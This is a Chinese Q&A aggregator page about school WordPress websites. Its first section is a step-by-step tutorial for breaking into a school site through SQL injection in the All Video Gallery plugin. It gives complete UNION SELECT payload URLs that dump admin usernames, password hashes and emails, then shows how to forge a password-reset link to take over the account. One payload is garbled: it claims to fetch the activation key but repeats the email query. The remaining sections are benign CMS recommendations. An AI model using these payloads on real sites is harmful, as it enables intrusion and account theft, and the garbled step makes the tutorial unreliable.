导航:首页 > 文件教程 > Wordpress学校网站

Wordpress学校网站

发布时间:2023-06-30 04:50:34

A. 如何利用SQL注入漏洞攻破一个wordPress网站

SQL注入的基本原理

sql注入成因主要是对页面参数没有进行非法字符校验导致,比如说一个订单页面要显示某个客户的所有订单列表,这个页面的地址可能是http://xxx.com/list.php?customID=3,我们推理,这样页面的后台处理的sql应该是这样的:

select * form custom_order where custom_id = {$_GET['customID']}

按正常情况下,这里的接收的参数{$_GET['customID']}的值应该是传入的值3,这样页面就能正确的把所有客户ID等于3的订单信息显示到页面上。但是,如果这个参数被人恶意改成了如下形式:

http://xxx.com/list.php?customID=-1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin

按这样的参数拼装成的sql就成了这样:

select * form custom_order where custom_id = -1 union select 1,2,3,user,5,passwd,7,8,9,10 from admin

这样注入恶意sql后,订单列表页显示的就不是订单信息了,而是数据库中用户的名称和密码,或者任意其它想要的信息。下面我们就按照这个原理来一步一步的获取这个公立学校网站的管理员用户名,管理员邮箱地址,通过邮箱重置管理员密码,登录超级管理员后台。

All Video Gallery插件的漏洞简介

安装了All Video Gallery插件的Wordpress博客里会有这样的一个地址:

http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11

访问这个页面会显示一些配置信息,问题就出在pid这个参数上,程序后台显然没有严格检查这个参数,我们将利用这个参数进行sql注入。

WordPress是一个开源的平台,我们很容易弄清楚用户表的表名是wp_users,存放用户名,密码,邮件地址的字段分别是user_login,user_pass,user_email,我们下面将要把用户信息表注入进去。

获取超级管理员用户名

为了获取用户表中的用户名,我们注入的sql是这样的:

http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users

在浏览器里输入上面的地址,页面上会显示下面的信息:

获取超级管理员邮件地址

我们可以直接获取用户的密码,但很显然,密码都是加密的,无法使用,我们这里使用另外一种思路,先获取用户的邮件地址,然后使用这个邮件重置用户的密码。

要获取邮件地址,我们需要将上面的sql中的字段名改成user_email:

http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users

在浏览器里输入上面的地址,页面上会显示下面的信息:

重置管理员密码

WordPress的后台登陆地址是http://xxx.com/wp-login.php,这个地址是可以公共访问的,我们进入这个页面后,点击Lost your password?链接,输入上面获取的管理员邮件。

这样做了之后,Wordpress会向这个邮件地址发送一封含有激活码的密码重置地址。我们无法登陆这个邮箱获取这个地址,但我们可以使用上面同样
的方法获取这个激活码,自己拼装出密码重置地址。存放激活码的字段是user_activation_key,我们的sql注入地址改成下面这样:

http://xxx.com/wp-content/plugins/all-video-gallery/config.php?vid=11&pid=1&pid=-1
union select
1,2,3,4,group_concat(user_login,0x3a,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
from wp_users

在浏览器里输入上面的地址,页面上会显示下面的信息:

有了激活码,我们就可以拼装出装置密码的地址了:

http://xxx.com/wp-login.php?action=rp&key=resetkey&login=username

利用这个地址进入重置密码页面:

总结

我们的黑客行动到此基本上是大功告成,但事实上我并没有去执行最后一步。本文的目的不是要告诉人们如何进行黑客攻击,而是要提醒大家防范安全漏洞,
所谓知己知彼,方能百战不殆,程序员应当对基本的黑客攻击方式有一些了解,针对性的在编程时避免造成类似sql注入的安全漏洞,构筑更健壮的软件。

B. 求一个关于学校的Html+Css的静态网站源码

直接去下载网站系统来做,适合做学校的比如pageadmin系统、wordpress系统这些都可以。

C. 一个学校网站应该包含哪些栏目

一般的网站后台都可以自己增加栏目的,你网站难道没有后台吗?

你可以去下载专业网站管理系统来用算了,
比如pageadmin系统、wordpress系统、shopex系统这些都很好用

D. 网站建设的步骤有哪些

E. 教育类网站国微cms和帝国cms哪个更好一些

帝国CMS
非常老牌的CMS,就如同该CMS官网介绍的安全、强大、稳定、灵活。
安全性:高,姜就是老的辣,老牌的CMS就是靠谱,安全性四颗星★★★★☆。
模板丰富度:帝国CMS的模板与程序分离,在二次开发与模板设计上非常灵活,这样就决定着要对PHP有一点了解,标签的参数较为复杂,网络上的资源较为丰富,但是模板的导入导出功能对新手不太友好,同时扩展库也较为丰富,三颗星★★★☆☆。
上手简易度:帝国CMS后台设置参数较多,所有信息皆存储在数据库中,功能搭配上较为严谨,对新手来说需要一定的学习成本,三颗星★★★☆☆。
国微CMS
国微CMS为国内最主流的CMS系统之一,也是中国南方PHP领域最大的开源平台提供商。现拥有平台注册用户超过23万,下载次数达到70余万次,主要面向政府、军队、学校、集团级客户。耕耘八年,国微CMS采用二代框架,在系统高性能、速度、模块化、体系化、可视化等方面极具核心竞争优势, 可确保客户运营成功。
网络转载!

阅读全文

与Wordpress学校网站相关的资料

热点内容
ps自动生成的文件格式 浏览:232
mac应用程序打不开了 浏览:836
qq飞车手游内测版下载地址 浏览:927
中文网站翻译成俄语多少钱 浏览:107
文件名加标题 浏览:644
共享数据怎么被冻结了 浏览:150
如何登记考勤数据 浏览:640
苹果6s前置照片效果 浏览:171
企业微信素材库文件下载链接 浏览:582
pdf文件怎么取消标黄 浏览:781
打电话时不能使用网络是什么原因 浏览:919
ps怎么将文件合并 浏览:747
java的日期格式化 浏览:981
电脑应用程序怎么关 浏览:986
微信上链接在哪个文件夹 浏览:691
欧姆龙安装打开找不到密钥文件 浏览:302
苹果基本表情 浏览:128
我的世界教育版编程在哪里 浏览:842
pong文件夹找不到 浏览:759
69版本黑切 浏览:997

友情链接